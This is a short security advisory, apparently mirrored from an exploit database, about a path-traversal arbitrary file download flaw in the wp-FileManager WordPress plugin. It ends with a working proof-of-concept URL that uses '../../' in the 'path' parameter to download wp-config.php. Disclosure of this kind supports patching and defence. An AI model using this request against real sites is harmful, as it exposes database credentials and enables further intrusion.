WordPress Plugin wp-FileManager – ‘path’ Arbitrary File Download

  • 作者: ByEge
    日期: 2013-05-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38515/
  • source: https://www.securityfocus.com/bid/59886/info
    
    The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
    
    An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. 
    
    http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download